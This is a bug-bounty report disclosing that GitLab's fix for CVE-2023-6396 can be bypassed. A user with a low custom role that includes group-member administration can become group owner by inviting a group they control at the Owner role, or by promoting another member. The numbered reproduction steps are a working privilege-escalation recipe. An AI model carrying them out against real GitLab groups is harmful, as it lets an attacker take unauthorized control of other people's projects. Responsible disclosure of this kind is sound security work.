User with "admin_group_members" can still invite other groups to gain owner access (CVE-2023-6396 bypass)
HackerOne report #2270898 by joaxcar
on 2023-12-03, assigned to @rshambhuni:
Report
Summary
GitLab 16.6.1 patched a fix where users with the custom role "admin_group_membsers" could invite users at a higher role than the custom roles base role. This restriction is now in place, but in groups that allow for users to request access (public or internal groups) a user with this custom role can still take ownership of the group by inviting a group instead of inviting a "member"
An attack would look like this
- A user gets assigned a custom role based on Guest that allows for
admin_group_user
- The user creates another group where it will become
owner
- Then the attacker invites this new group at "max membership role" as
owner
- The attacker will now be owner of the target group
Steps to reproduce
Preconditions:
- Start a new Ultimate trial on Gitlab.com
- Create two users
victim_user
,attacker_user
- Create a
private
groupprivate_ultimate_group
asvictim_user
- Go to https://gitlab.com/groups/GROUPNAME/-/settings/roles_and_permissions
- Create a custom role with
admin_group_member
checked, based onguest
. Call it "guest manager" - Go to https://gitlab.com/groups/GROUPNAME/-/group_members and invite
attacker_user
as "guest manager"
The attack:
7. Log in as attacker_user
8. Create a new group called attacker_group
9. Go to https://gitlab.com/groups/private_ultimate_group/-/group_members
Scenario 1
- Click "Invite group"
- Search for
attacker_group
and select it. Also select "Role" asowner
- Click invite
- Refresh the page and the attacker should now be
owner
of the group with full owner access
Scenario 2
- Find existing group member (it can be attacker's second account they added as guest)
- Change it to any role higher than guest, eg. owner
- Refresh the page and the existing member should now be
owner
of the group with full owner access
Impact
Privilege escalation from low custom role to group owner
What is the current bug behavior?
Custom role users can invite groups at higher role level than itself
What is the expected correct behavior?
Custom roles should only be allowed to invite groups at max their own level
Output of checks
This bug happens on GitLab.com
Impact
Privilege escalation from low custom role to group owner
Impact
Privilege escalation from low custom role to group owner
How To Reproduce
Please add reproducibility information to this section: